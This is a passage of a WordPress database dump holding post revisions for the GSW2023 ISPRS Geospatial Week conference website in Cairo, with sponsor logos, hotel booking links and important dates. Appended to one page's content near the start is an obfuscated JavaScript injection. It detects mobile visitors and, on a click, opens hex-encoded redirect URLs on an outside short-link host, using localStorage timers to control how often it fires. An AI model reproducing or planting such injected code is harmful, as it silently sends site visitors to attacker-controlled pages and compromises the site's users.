style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:02:55','2023-06-09 22:02:55','',3066,'https://gsw2023.com/?p=4663',0,'revision','',0),
(4664,1,'2023-06-09 22:03:14','2023-06-09 22:03:14','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" type=\"masonry\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 